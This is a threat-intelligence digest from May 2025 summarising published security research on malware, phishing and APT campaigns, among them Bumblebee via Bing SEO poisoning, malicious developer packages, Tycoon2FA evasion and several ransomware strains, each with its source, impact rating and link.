Date of Scan:: 2025-05-26

Impact:: MEDIUM

Summary:: Cyjax researchers have identified a new Bumblebee malware distribution campaign that exploits Bing SEO poisoning. The attackers target users searching for software like WinMTR and Milestone XProtect by creating fake download sites. These sites, hosted on a Truehost Cloud server in Nairobi, rank highly in Bing search results and deliver trojanized MSI installers from an external domain. When executed via msiexec.exe, the installer drops both legitimate software components and malicious files, including a tampered version.dll and icardagt.exe. The executable loads the malicious DLL, leading to the deployment of the Bumblebee malware. Once active, Bumblebee connects to command-and-control (C2) domains using unique 13-character strings followed by a .life TLD. The campaign appears to be an evolution of a similar 2023 SEO poisoning strategy and is now focused on targeting less mainstream software tools often used in technical development environments.

Source: https://www.cyjax.com/resources/blog/a-sting-on-bing-bumblebee-delivered-through-bing-seo-poisoning-campaign/

Intel Source:: Sekoia

Intel Name:: ViciousTrap_Edge_Device_Honeypot_Network

Date of Scan:: 2025-05-26

Impact:: LOW

Summary:: Researchers from Sekoia have identified ViciousTrap, an actor compromising over 5,500 edge devices globally since March 2025, primarily in Asia, to create a distributed honeypot network. Likely Chinese-speaking, ViciousTrap exploits vulnerabilities like CVE-2023-20118 in devices from over 50 brands, using a script (NetGhost) to redirect traffic from compromised systems to its Malaysian-based interception servers, enabling Man-in-the-Middle data collection on various monitored assets, including some in Taiwan and the US.

Source: https://blog.sekoia.io/vicioustrap-infiltrate-control-lure-turning-edge-devices-into-honeypots-en-masse/

Intel Source:: Datadog

Intel Name:: MUT_9332_Targets_Solidity_Developers

Date of Scan:: 2025-05-25

Impact:: MEDIUM

Summary:: Datadog researchers have uncovered a campaign by the threat actor MUT-9332 targeting Solidity developers on Windows systems. The attackers leveraged deceptive VS code extensions that appeared legitimate but secretly ran malicious code in the backgroud. These malicious extensions, discovered between April and May 2025 before being removed from the Marketplace, initiated multi-stage infection chains involving obfuscated JavaScript, PowerShell scripts and steganography to hide payloads within image files. Their primary goal was to steal sensitive information such as cryptocurrency wallet credentials and system information and deploy a remote access tool called Quasar RAT to give the attackers control over the victim’s system.

Source: https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/

Intel Source:: Securelist

Intel Name:: PureRAT_Spam_Attacks_in_Russia

Date of Scan:: 2025-05-25

Impact:: LOW

Summary:: Securelist researchers discovered an increase in attacks against Russian enterprises utilizing the Pure malware family, specifically PureRAT and PureLogs. This campaign has been active since March 2023, and it experienced a fourfold growth in early 2025 compared to the same period in 2024. The campaign, which is distributed via spam emails containing malicious RAR files or links, deceives users by using accounting-related file names and double extensions such as.pdf.rar.

Source: https://securelist.ru/purerat-attacks-russian-organizations/112619/

Intel Source:: Spider Labs

Intel Name:: Fake_Zoom_Invites_Steal_Credentials

Date of Scan:: 2025-05-24

Impact:: LOW

Summary:: SpiderLabs researchers have identified a phishing campaign targeting corporate users with fake Zoom meeting invitations designed to steal login credentials. The attackers leverage urgent and legitimate looking emails to lure recipients into clicking malicious links. These links leads to deceptive Zoom pages that include pre-recorded videos making it appears as live meeting is in progress but after a fake disconnection message, it asks users to enter their credentials on a fake screen. Once entered, the stolen information is immediately sent to the attackers through Telegram. The primary objective of this campaign is to steal login credentials which could lead to account takeovers.

Source: https://x.com/SpiderLabs/status/1924424257083179462

Intel Source:: Hunt.IO

Intel Name:: W3LL_Phishing_Kit_Hits_Outlook_Users

Date of Scan:: 2025-05-23

Impact:: MEDIUM

Summary:: Researchers from Hunt.IO have discovered a phishing campaign leveraging the W3LL Phishing Kit to target Microsoft Outlook credentials. This Phishing-as-a-Service (PaaS) tool, initially identified by Group-IB in 2022 and available through the W3LL Store marketplace, enables attackers to conduct adversary-in-the-middle (AiTM) attacks to hijack session cookies and bypass multi-factor authentication. The observed campaign utilized an open directory on IP address to host W3LL phishing kit components, including IonCube obfuscated PHP files in folders named "OV6". The phishing lure involved a fake Adobe Shared File service webpage that, upon attempted login, sent credentials via a POST request, specifically to a /wazzy.php endpoint.

Source: https://hunt.io/blog/phishing-kit-targets-outlook-credentials

Intel Source:: Proofpoint

Intel Name:: TA406_Targeting_Government_Entities_in_Ukraine

Date of Scan:: 2025-05-23

Impact:: MEDIUM

Summary:: Researchers from ProofPoint have uncovered a phishing campaigns run by DPRK state-sponsored actor TA406 also known as Opal Sleet and Konni targeting government entities in Ukraine. The campaigns focus on credential harvesting and malware deployment to collect intelligence related to the ongoing Russian invasion. The attackers impersonate members of think tank and send fake Microsoft security alerts to trick people into opening malicious files in HTML, CHM, ZIP or LNK formats. These files execute hidden PowerShell script that gathers host data, establishes persistence via autorun batch files and send the data to servers controlled by the attackers.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta406-pivots-front

Intel Source:: ASEC

Intel Name:: PyBitmessage_Backdoor_Malware

Date of Scan:: 2025-05-23

Impact:: LOW

Summary:: ASEC researchers have identified a hidden backdoor that installs alongside a Monero cryptocurrency miner which leverages the PyBitmessage library for C2 communications. The initial malware decrypts and deploys both the coinminer and a filess PowerShell based backdoor that executes directly in memory and downloads additional malicious tools from Github or Russian file hosting services. The attacker’s primary motive is to exploit compromised system for cryptocurrency mining while establishing persistent access through the backdoor for potential further attacks.

Source: https://asec.ahnlab.com/ko/88104/

Intel Source:: SpiderLabs

Intel Name:: Tycoon2FA_Phishing_Using_Malformed_URLs

Date of Scan:: 2025-05-22

Impact:: MEDIUM

Summary:: SpiderLabs researchers have identified that Tycoon2FA-linked phishing campaigns are targeting Microsoft 365 users. These campaigns leverage malformed URLs containing backslash characters (https:\\) instead of forward slashes. Despite this unconventional formatting, most web browsers still resolve these links, leading unsuspecting victims to credential harvesting pages. This technique is employed by threat actors to bypass email security filters and evade URL-based detection systems, ultimately aiming to steal Microsoft 365 credentials. The infrastructure observed involves domains hosted on services like Azure and Cloudflare Workers.

Source: https://x.com/SpiderLabs/status/1924486856902586689

Intel Source:: Socket

Intel Name:: Koishi_Chatbot_Plugin_Steals_Messages

Date of Scan:: 2025-05-22

Impact:: LOW

Summary:: Researchers at Socket have discovered a malicious npm package, koishi-plugin-pinhaofa, designed to exfiltrate data from Koishi chatbots. Marketed as a spelling auto-correct helper, the plugin, once installed, silently scans all chatbot messages for any eight-character hexadecimal string. Upon finding such a string, which could represent sensitive data like commit hashes, API tokens, or checksums, the plugin forwards the entire message content to a hardcoded QQ account (UIN: 1821181277) controlled by the threat actor, who uses the npm alias kuminfennel. This exposes any secrets or credentials embedded within or surrounding the trigger string. This activity represents a supply chain attack targeting chatbot frameworks, exploiting the trust developers place in community plugins and the unrestricted access these plugins often have within the bot process.

Source: https://socket.dev/blog/malicious-koishi-chatbot-plugin?utm_medium=feed

Intel Source:: The DFIR Report

Intel Name:: Confluence_Hit_by_ELPACO_Ransomware

Date of Scan:: 2025-05-22

Impact:: MEDIUM

Summary:: The DFIR Report researchers have observed that an unpatched, internet-facing Confluence server was compromised via CVE-2023-22527, leading to the deployment of ELPACO-team ransomware (a Mimic variant) approximately 62 hours later. The threat actor initially used the exploit to deploy a Metasploit payload and establish C2 via IP. Following initial access, the actor performed privilege escalation using RPCSS named pipe impersonation, created a local administrator account ("noname"), and installed AnyDesk for persistent remote access via a self-hosted server. Extensive discovery, including network scanning with SoftPerfect NetScan and attempted Zerologon exploitation, preceded credential harvesting using Mimikatz and Impacket's Secretsdump. Lateral movement was achieved using the compromised domain administrator credentials via Impacket wmiexec and RDP.

Source: https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/#indicators

Intel Source:: ISC.SANS

Intel Name:: AutoIT_Based_AsyncRAT_Delivery_Chain

Date of Scan:: 2025-05-22

Impact:: LOW

Summary:: Researchers at ISC.SANS have found a malware campaign that delivers a RAT through a dual-layer AutoIT script framework. The first executable downloads an AutoIT interpreter and a second obfuscated AutoIT script that decodes and executes commands using a custom Wales() function. Persistence is enabled using a custom shortcut in the Startup folder that runs JavaScript and initiates further execution. The final payload, injected into a jsc.exe process as a DLL called Urshqbgpm.dll, attempts to communicate with a known AsyncRAT C2 server and includes references to PureHVNC functionality.

Source: https://isc.sans.edu/diary/31960

Intel Source:: ASEC

Intel Name:: SEO_Poisoning_Infostealer_Trends

Date of Scan:: 2025-05-22

Impact:: LOW

Summary:: Researchers at ASEC have identified ongoing trends in Infostealer malware spread throughout April 2025, focusing on the continued use of crack and keygen disguises to entice victims. These threats, typically promoted by SEO poisoning to appear at the top of search results, included well-known Infostealers such as LummaC2, Vidar, and StealC.

Source: https://asec.ahnlab.com/en/88062/

Intel Source:: ASEC

Intel Name:: DBatLoader_Targeting_Turkish_Users

Date of Scan:: 2025-05-21

Impact:: LOW

Summary:: ASEC researchers have identified a phishing campaign targeting Turkish users with malware known as DbatLoader also called ModiLoader. The attackers send phishing emails in the Turkish language, impersonating bank transaction notification which contain a malicious RAR file with BAT script. This initial BAT scripts executes DBatLoader which then leverages a series of obfuscated batch scripts and legitimate Windows tool to hide its activity and bypass security systems to install SnakeKeylogger. This malware steals system information, keyboard input and clipboard data and send stolen data to attackers Telegram’s C2 server.

Source: https://asec.ahnlab.com/ko/87980/

Intel Source:: Reversinglabs

Intel Name:: PyPI_Backdoor_Targets_Developers

Date of Scan:: 2025-05-21

Impact:: LOW

Summary:: Researchers at ReversingLabs have uncovered a malicious Python package called "dbgpkg" on the PyPI repository disguised as debugging tool. Once installed by developers, it deploy a backdoor that allow attackers to execute malicious code and exfiltrate sensitive data. The malware uses Python function wrappers on the requests and socket modules to run its code in the background that downloads a public key from Pastebin and uses a tool called Global Socket Tool to bypass firewalls and connect to the attacker’s server. This campaign is believed to be linked to Phoenix Hyena/DumpForums which has been targeting Russian interests in support of Ukraine since 2022.

Source: https://www.reversinglabs.com/blog/backdoor-implant-discovered-on-pypi-posing-as-debugging-utility

Intel Source:: Any.Run

Intel Name:: Evolution_of_Tycoon_2FA_Defense_Evasion_Mechanisms

Date of Scan:: 2025-05-20

Impact:: MEDIUM

Summary:: ANY.RUN researchers have analyzed the Tycoon 2FA Phishing-as-a-Service (PhaaS) platform, active since August 2023 and targeting Microsoft 365 and Gmail credentials, has demonstrated continuous evolution in its anti-detection mechanisms. This AiTM phishing kit employs a multi-stage attack, starting with obfuscated JavaScript on a landing page, which performs several checks ("nomatch" decoy, domain comparison) before proceeding. It then uses Cloudflare Turnstile CAPTCHA (or other CAPTCHA services like reCAPTCHA and IconCaptcha in later variants) and C2 server queries to validate the user before delivering the core phishing content. Later stages involve further Base64/XOR obfuscation, encrypted payload delivery, and dynamic URL generation for data exfiltration to a C2 infrastructure often using .ru, .es, .su, .com, and .net TLDs. Notable new evasion techniques observed between December 2024 and May 2025 include debugger timing checks, debug environment detection (Selenium, PhantomJS), keystroke interception, context menu blocking, dynamic multimedia loading from legitimate CDNs for victim-tailored lures, invisible JavaScript obfuscation, custom fake page redirects, custom CAPTCHAs, browser fingerprinting, and AES encryption for payload obfuscation.

Source: https://any.run/cybersecurity-blog/tycoon2fa-evasion-analysis/

Intel Source:: Qualys

Intel Name:: PowerShell_Loader_Executes_Remcos_RAT

Date of Scan:: 2025-05-20

Impact:: LOW

Summary:: Qualys Researchers have identified a new PowerShell based shellcode loader that filelessly loads and executes a variant of Remcos RAT. The attackers deliver this malware inside ZIP that contain malicious LNK files disguised as office document. When user open this file. It triggers an HTA file using mshta.exe which then download and executes obfuscated PowerShell code that runs directly in the system’s memory. It leverages Windows functions to load a Remcos RAT variant known as K-Loader. This variant has extensive capabilities including keylogging, screen capture, clipboard access, UAC bypass, and process hollowing for evasion.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2025/05/15/fileless-execution-powershell-based-shellcode-loader-executes-remcos-rat

Intel Source:: EclecticIQ

Intel Name:: China_Nexus_State_Actors_Exploiting_SAP_Vulnerability

Date of Scan:: 2025-05-20

Impact:: MEDIUM

Summary:: EclecticIQ researchers have uncovered that China-nexus state sponsered groups such as UNC5221, UNC5174 and CL-STA-0048 exploitating an unauthenticated file upload vulnerability (CVE-2025-31324) in SAP NetWeaver Visual Composer.The threat actor leverging remote code execution to deploy malicious webshells, enabling command execution, install additional payloads like KrustyLoader and the SNOWLIGHT RAT. They are targeting government and essential service organizations in the UK, US and Saudi Arabia, aiming to compromise critical infrastructure, exfiltrate sensitive data, and maintain persistent.

Source: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures

Intel Source:: Wazuh

Intel Name:: FrigidStealer_Malware

Date of Scan:: 2025-05-20

Impact:: LOW

Summary:: Wazuh researchers have uncovered a new information stealing malware named FrigidStealer targeting macOS users since January 2025 and potentially linked to EvilCorp syndicate. It is being distributed through fake browser updates pages on compromised websites, tricking users into downloading a malicious disk image. Upon execution, the malware asks for the user’s password by leveraging a pop-up through apple scripts to bypass the macOS Gatekeeper and then register itself as an application and ensures it runs every time the system starts. FrigidStealer exfiltrates sensitive data including browser credentials, files, system information, and cryptocurrency wallet details and secretly sends it to a remote server using DNS tunneling. It terminates its own process to evade detection.

Source: https://wazuh.com/blog/detecting-frigidstealer-malware-with-wazuh/

Intel Source:: Trend Micro

Intel Name:: Earth_Ammit_Targets_Drone_Supply_Chain

Date of Scan:: 2025-05-19

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have discovered that the Chinese-speaking threat group Earth Ammit undertook two synchronized multi-wave campaigns VENOM and TIDRONE between 2023 and 2024, with the goal of disrupting drone supply chains and compromising high-value targets in Taiwan and South Korea. The VENOM campaign targeted software service providers with open-source tools for stealth and low cost, but the subsequent TIDRONE campaign targeted the military industry with custom-built malware such as CXCLNT and CLNTEND for cyberespionage.

Source: https://www.trendmicro.com/en_us/research/25/e/earth-ammit.html

Intel Source:: CyberProof

Intel Name:: APT36_and_Hacktivists_Targeting_India

Date of Scan:: 2025-05-19

Impact:: HIGH

Summary:: Researchers at CyberProof have observed a surge in cyber-attacks targeting Indian systems, coinciding with heightened geopolitical tensions following a terrorist attack in Baisaran Valley on April 22, 2025. The Pakistan-linked APT36 (Transparent Tribe) has been observed targeting Indian government and defense offices with phishing URLs and their known Crimson RAT, a tool capable of extensive information theft and voice recording. Simultaneously, hacktivist groups including 'Cyber Group HOAX1337', 'IOK Hacker', and 'National Cyber Crew' have reportedly targeted Indian educational institutes. Lures used by APT36 include malicious PDF files and macro-embedded XLSM documents, often themed around official Indian government or military communications, such as those impersonating Jammu & Kashmir Police or the Indian Air Force. One identified PowerPoint (PPAM) file, "Report & Update Regarding Pahalgam Terror Attack.ppam," contained a malicious macro consistent with older APT36 droppers, designed to deploy Crimson RAT.

Source: https://www.cyberproof.com/blog/cyber-attacks-rise-as-tension-mounts-across-india-pakistan-border-post-terrorist-attack/

Intel Source:: ASEC

Intel Name:: Ransomware_Hits_Financial_Firms

Date of Scan:: 2025-05-19

Impact:: LOW

Summary:: Researchers from ASEC have identified a rise in cyber threats targeting financial institutions in Korea and around the world in April 2025. The research focuses on phishing and malware efforts, providing thorough insights into the top ten malware families and compromised Korean account data circulating on Telegram. A unique occurrence occurred when a threat actor, B_ose, sold over 1,700 stolen credit and debit card details on the Exploit forum, with 80% possibly valid and carrying sensitive information such as CVV numbers and addresses.

Source: https://asec.ahnlab.com/en/87975/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Analysis_of_APT_C_51_Recent_Attacks

Date of Scan:: 2025-05-18

Impact:: MEDIUM

Summary:: The 360 Advanced Threat Research Institute reported, that APT-C-51 (also known as APT35, Charming Kitten), an actor motivated by political and economic interests, conducted an espionage campaign targeting the Middle East. The attack, observed around January 2025, initiated with LNK files (Biography of Mr.leehu hacohn.lnk) that, upon execution, released a decoy PDF and a compressed archive (osf.zip). This archive contained multiple DLLs, including the malicious Wow.dll, which performed environment checks and decrypted a gclib file using AES (key: {}nj45kdada0slfk) to obtain a PowerShell script. This script was then executed by new.dll, leading to the deployment of the PowerLess Trojan (version: 3.3.4).

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247505927&idx=1&sn=d2298d5b26d0f1cfb53c4304a0c55c38

Intel Source:: Zscaler

Intel Name:: Technical_Investigation_of_TransferLoader

Date of Scan:: 2025-05-18

Impact:: LOW

Summary:: Researchers at Zscaler have analyzed a new malware loader named TransferLoader, active since at least February 2025. This loader, observed deploying Morpheus ransomware at an American law firm, contains multiple embedded components: a downloader, a backdoor, and a specialized loader for the backdoor. All components utilize anti-analysis techniques such as PEB debugging checks, dynamic API resolution via hashing, junk code insertion, and runtime string decryption using unique 8-byte XOR keys. The backdoor module communicates with its C2 server via HTTPS or raw TCP, using custom packet structures and a stream cipher for encryption, and notably employs the InterPlanetary File System (IPFS) as a decentralized fallback mechanism for C2 updates. The shared code similarities and evasion methods across TransferLoader components suggest a common developer.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-transferloader

Intel Source:: CERT-AGID

Intel Name:: Adwind_RAT_Targets_Italy_via_PDF_Spear_Phishing

Date of Scan:: 2025-05-18

Impact:: MEDIUM

Summary:: CERT-AGID researchers have identified a large-scale Adwind RAT distribution campaign targeting Italy, Spain, and Portugal, corroborating earlier findings by Fortinet. The attackers employ spear-phishing emails with PDF attachments (Document.pdf, Invoice.pdf) that contain links to cloud storage services like OneDrive or Dropbox. These links lead to the download of an obfuscated VBS or HTML file, which, once deobfuscated, downloads a decoy PDF from Google Drive and, in parallel, a ~90MB ZIP archive from a URL. Unlike previous Adwind campaigns that directly dropped JAR files, this variant delivers a ZIP package containing both the necessary Java environment and the Adwind JAR file disguised as a PNG image (InvoiceXpress.png). This JAR is executed via a CMD script (InvoiceXpress.cmd). The Adwind configuration, encrypted with AES in ECB mode, points to a C2 subdomain on port 4414, consistent with previous Adwind infrastructure.

Source: https://cert-agid.gov.it/news/distribuzione-mirata-in-italia-di-adwind/

Intel Source:: Reliaquest

Intel Name:: Ransomware_Groups_Exploiting_SAP_Vulnerability

Date of Scan:: 2025-05-17

Impact:: LOW

Summary:: Reliaquest researchers have uncovered that the Russian ransomware group called BianLian and the operators of the RansomEXX also known as Storm-2460 are exploiting the vulnerability CVE-2025-31324 in SAP NetWeaver Visual Composer. This vulnerability allows attackers remote code execution to upload and run malicious files without aunthentication. The attackers leverage this vulnerability to upload malicious JSP webshells to gain initial access and then deploy post-exploitation tools like Brute Ratel and Heaven's Gate for command-and-control, evasion and further compromise.

Source: https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/

Intel Source:: Truesec

Intel Name:: FortiVoice_Zero_Day_RCE_Exploited

Date of Scan:: 2025-05-17

Impact:: LOW

Summary:: Researchers at Truesec have discovered that CVE-2025-32756, a zero-day stack-based buffer overflow vulnerability in Fortinet products, has been extensively exploited in the field. The vulnerability affects FortiVoice, FortiRecorder, FortiMail, FortiNDR, and FortiCamer, allowing remote, unauthenticated attackers to execute arbitrary commands via specially crafted HTTP requests with a modified hash cookie.

Source: https://www.truesec.com/hub/blog/cve-2025-32756-fortivoice-zero-day-buffer-overflow-exploited

Intel Source:: Jamf Threat Labs

Intel Name:: PyInstaller_Malware_on_MacOS_Users

Date of Scan:: 2025-05-16

Impact:: LOW

Summary:: Jamf Threat Labs uncovered a new infostealer targeting macOS users. It is delivered through PyInstaller, a legitimate tool that converts Python scripts into Mach-O executable. This technique allow attackers to execute malicious Python payloads without requiring a Python installation on the system which is important because Apple no longer includes Python by default. The malware named stl installer and sosorry leverages fake password prompts to trick users into giving up their credentials. It can also run additional malicious AppleScript commands from a remote server, steal saved passwords and other sensitive information from the macOS Keychain and search for cryptocurrency wallets to exfiltrate private keys.

Source: https://www.jamf.com/blog/pyinstaller-malware-jamf-threat-labs/

Intel Source:: Palo Alto

Intel Name:: DarkCloud_Stealer

Date of Scan:: 2025-05-16

Impact:: LOW

Summary:: Palo Alto researchers have discovered a new data-stealing malware called DarkCloud Stealer which has been active since 2022. It is distributed primarily through phishing emails that contain malicious RAR file or a PDF designed to trick users into downloading the RAR from a file-sharing site. The archive contains an AutoIt-compiled executable which unpacks and executes the final payload called DarkCloud Stealer. This stealer is capable of harvesting a wide range of sensitive data, including browser and email credentials, FTP details, contact lists, system details and screenshots. It has been targeting multiple industries such as finance, manufacturing, Media and Entertainment and government with a particular focus on U.S. and Brazil.

Source: https://unit42.paloaltonetworks.com/darkcloud-stealer-and-obfuscated-autoit-scripting/

Intel Source:: Fortinet

Intel Name:: Devices_Hit_by_Stack_Overflow

Date of Scan:: 2025-05-16

Impact:: MEDIUM

Summary:: Fortinet researchers have discovered a stack-based buffer overflow vulnerability (CWE-121) in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera products that could allow a remote unauthenticated attacker to execute arbitrary code or commands using specially crafted HTTP requests. Notably, this vulnerability has been extensively exploited in the wild, specifically targeting FortiVoice devices.

Source: https://fortiguard.fortinet.com/psirt/FG-IR-25-254

Intel Source:: Reversinglabs

Intel Name:: PyPI_Packages_Targets_Solana_Developers

Date of Scan:: 2025-05-16

Impact:: LOW

Summary:: Researchers at ReversingLabs have discovered malicious Python package called solana-token on the PyPI repository. It specifically targets Solana blockchain developers to steal source code and developer secrets. This package masquerading as a legitimate tool for Solana blockchain but secretly sends Python files and their contents to a hardcoded IP address. The solana-token package, downloaded over 600 times and even reused the name of an earlier malicious package before it was removed.

Source: https://www.reversinglabs.com/blog/same-name-different-hack-pypi-package-targets-solana-developers

Intel Source:: Any.Run

Intel Name:: Mamona_Ransomware

Date of Scan:: 2025-05-15

Impact:: MEDIUM

Summary:: Researchers from ANY.RUN have uncovered a new ransomware strain called Mamona that first appeared in May 2025 and is believed to be linked to BlackLock affiliates. This ransomware operates offline which means it encrypts files on the victim's system without connecting to a remote server. It encrypts the file with .HAes extension and drops ransom notes (README.HAes.txt) claiming data been stolen. However, no data exfiltration or C2 communication has been observed. The group employs on simple obfuscation technique like delay loops and deletes itself after running to avoid detection. It relies on custom encryption methods instead of standard libraries but decryption tool exists that can recover files. This easy-to-use ransomware lowers the entry barrier for less skilled threat actor to contribute to wider ransomware activities.

Source: https://any.run/cybersecurity-blog/mamona-ransomware-analysis/

Intel Source:: ISC.SANS

Intel Name:: Python_InfoStealer_with_Phishing_Server

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: Researchers at ISC.SANS have found a Python-based InfoStealer that not only has basic capabilities such as anti-debugging, persistence via registry and scheduled tasks, keylogging, clipboard capture, and periodic snapshots, but also embeds a phishing web server using Flask. The malware sends data encrypted with the Fernet module to a Telegram channel and operates its modules in separate threads to maximize efficiency.

Source: https://isc.sans.edu/diary/rss/31924

Intel Source:: Palo Alto

Intel Name:: Gremlin_Stealer

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: Researchers from Palo Alto have discovered a new info-stealing malware called Gremlin Stealer that first emerged in March 2025. It is written in C language and capable of stealing sensitive data from Windows systems such as passwords, browser cookies, form inputs and credit card information from popular browsers such as Chrome and Gecko-based browsers. It also targets cryptocurrency wallets like Exodus, MetaMask, Monero), FTP clients (TotalCommander, FileZilla), VPNs, Steam, Telegram and Discord channels. The malware collects system information, takes screenshots, swaps crypto wallet addresses and sends all stolen data in ZIP file to a command-and-control server or via a Telegram. The operation appears to make money both by selling the malware and through the stolen data.

Source: https://unit42.paloaltonetworks.com/new-malware-gremlin-stealer-for-sale-on-telegram/

Intel Source:: Seqrite

Intel Name:: Stealerium_Infostealer

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: Seqrite Labs researchers have uncovered an ongoing campaign targeting U.S. citizens during tax season by taking advantage of the annual tax filing deadline. Threat actors are sending phishing emails containing malicious LNK file disguised as legitimate tax related documents to deceive users into opening them. Once user clicks on the attachment, the LNK file executes hidden PowerShell commands that download and install a data-stealing malware called Stealerium . This malware is designed to steal sensitive information like browser passwords, crypto wallets, chat logs, VPN and Wi-Fi credentials, and other system details.

Source: https://www.seqrite.com/blog/threat-actors-are-targeting-us-tax-session-with-new-tactics-of-stealerium-infostealer/

Intel Source:: Cyberint

Intel Name:: Scattered_Spider_Hits_UK_Retail

Date of Scan:: 2025-05-15

Impact:: HIGH

Summary:: Researchers at Cyberint have discovered that the financially motivated threat group Scattered Spider, also known as Roasting 0ktapus or Scatter Swine, is most likely responsible for recent cyberattacks against UK retail organizations, with the DragonForce ransomware cartel being blamed for the extortion stage. Scattered Spider has been active since 2022, transitioning from targeting telecom and BPO sectors to attacking high--leverage businesses such as retail, particularly during peak seasons. The organization deploys advanced identity-centric approaches, such as social engineering, SMS and Telegram phishing, SIM swapping, and MFA fatigue attacks. They use vulnerabilities such as CVE-2015-2291 and CVE-2021-35464, as well as programs like STONESTOP, POORTRY, and various remote access applications, to disable protections, gain persistence, and exfiltrate data.

Source: https://cyberint.com/blog/dark-web/meet-scattered-spider-the-group-currently-scattering-uk-retail-organizations/

Intel Source:: ESET Research

Intel Name:: TheWizards_APT_Group_Activity

Date of Scan:: 2025-05-15

Impact:: MEDIUM

Summary:: Researchers at ESET have observed the activity of TheWizards, a China-aligned APT group active since at least 2022, targeting entities in the Philippines, Cambodia, UAE, mainland China, and Hong Kong. The group employs a sophisticated adversary-in-the-middle (AitM) tool named Spellbinder, which exploits IPv6 Stateless Address Autoconfiguration (SLAAC) spoofing within compromised networks. This technique allows TheWizards to intercept local network traffic, specifically DNS requests for popular Chinese software update domains (e.g., Tencent QQ, Sogou Pinyin), and redirect victims to attacker-controlled servers delivering malicious updates. These updates deploy a downloader, often disguised as a legitimate DLL side-loaded by abused executables, which in turn fetches and executes the modular .NET backdoor, WizardNet.

Source: https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/

Intel Source:: Rixed Labs

Intel Name:: Pupkin_Stealer

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: A recent analysis details Pupkin Stealer, a straightforward .NET-based info-stealer first identified in April 2025. It is likely developed by a Russian-speaking freelancer or novice developer known as "Ardent." Pupkin targets Windows systems, running multiple tasks to steal credentials from Chromium browsers, Discord tokens, active Telegram sessions, specific desktop files (.pdf, .txt, .sql, .jpg, .png), and even desktop screenshots. The malware relies on standard .NET libraries and embeds dependencies using Costura.Fody, which results in high file entropy but lacks advanced evasion techniques or persistence mechanisms. The stolen data is compressed into a ZIP archive and exfiltrated via a hardcoded Telegram bot API, though the exfiltration process has flaws, such as incorrect byte-to-string conversion and improper MIME type handling.

Source: https://muff-in.github.io/blog/pupkin-info-stealer-analysis/

Intel Source:: Cyfirma

Intel Name:: Gunra_Ransomware_Targeting_Windows

Date of Scan:: 2025-05-15

Impact:: MEDIUM

Summary:: Researchers at CYFIRMA have discovered a new ransomware strain called Gunra that mainly targets Windows-based systems in a variety of worldwide industries, including real estate, pharmaceuticals, and manufacturing. Gunra, based on Conti ransomware, uses double-extortion techniques by encrypting files with the ".ENCRT" extension and threatening to expose stolen data over a Tor-hosted page. The malware uses complex tactics such as anti-analysis with the IsDebuggerPresent API, evasion of rule-based detections, obfuscation, and shadow copy deletion via WMI.

Source: https://www.cyfirma.com/research/gunra-ransomware-a-brief-analysis/

Intel Source:: unit42

Intel Name:: Iranian_Espionage_via_Fake_Model_Site

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: Unit 42 researchers have found an emerging Iranian cyberespionage operation that used a fake website to pose as a German model agency. The website, which imitates the branding of the firm, uses obfuscated JavaScript to gather comprehensive visitor data, including IP addresses, browser fingerprints, and screen resolutions, most likely in order to facilitate aimed targeting. A bogus profile that has an invalid hyperlink to a private album points to potential spear phishing or other social engineering attack preparations.

Source: https://unit42.paloaltonetworks.com/iranian-attackers-impersonate-model-agency/

Intel Source:: Bitdefender

Intel Name:: Criminals_Targeting_End_of_Life_Routers

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: The FBI has issued a cybersecurity advisory about a rise in surge in malicious activity targeting end-of-life (EOL) routers, with a particular focus on outdated Linksys models. Threat actors are exploiting known and unpatchable vulnerabilities commonly found in the built-in remote management software of these unsupported devices. The FBI reports that attackers are deploying malware such as 5Socks and Anyproxy to gain persistent root-level access, effectively converting the compromised routers into botnet infrastructures. These devices are then used to steal sensitive user information like login credentials and financial information to launch DDoS attacks or are sold as proxy nodes to other threat actors.

Source: https://www.bitdefender.com/en-us/blog/hotforsecurity/fbi-end-of-life-routers-cyberattacks

Intel Source:: Infoblox

Intel Name:: Pig_Butchering_Operation

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: Infoblox uncovered a cryptocurrency scam named pig butchering operation disguised as a remote job offer that began through a message on Telegram from a fake company called Corner Office Consultants. This fake job involved repetitive online tasks for commissions on a website impersonating the legitimate marketing firm Marble Media. After completing some tasks, they lure victims into depositing cryptocurrency by creating a negative account balance that required topping up to continue working or withdraw supposed earnings. The cybercriminals leverage fake identities using stock photos and later switched to romance scams when the task-based fraud stalled.

Source: https://blogs.infoblox.com/threat-intelligence/telegram-tango-dancing-with-a-scammer/

Intel Source:: MalwareBytes

Intel Name:: Fake_SSA_Emails_Install_Remote_Access_Tool

Date of Scan:: 2025-05-15

Impact:: MEDIUM

Summary:: Malware Bytes researchers have identified a phishing campaign leveraging fake US Social Security Administration (SSA) emails to trick users into installing the legitimate remote access tool such as ScreenConnect. These deceptive emails sent by a group known as Molatori, claim that a Social Security statement is ready for to download but exclusively on Windows PCs. When victims click the link, they unknowingly install ScreenConnect which give attackers full remote access to their systems. This access allows them to execute commands, transfer files, install further malware and exfiltrate sensitive data like banking details and personal identification numbers.

Source: https://www.malwarebytes.com/blog/news/2025/04/fake-social-security-statement-emails-trick-users-into-installing-remote-tool

Intel Source:: Hunt.IO

Intel Name:: Uncovering_SuperShell_and_CobaltStrike

Date of Scan:: 2025-05-15

Impact:: LOW

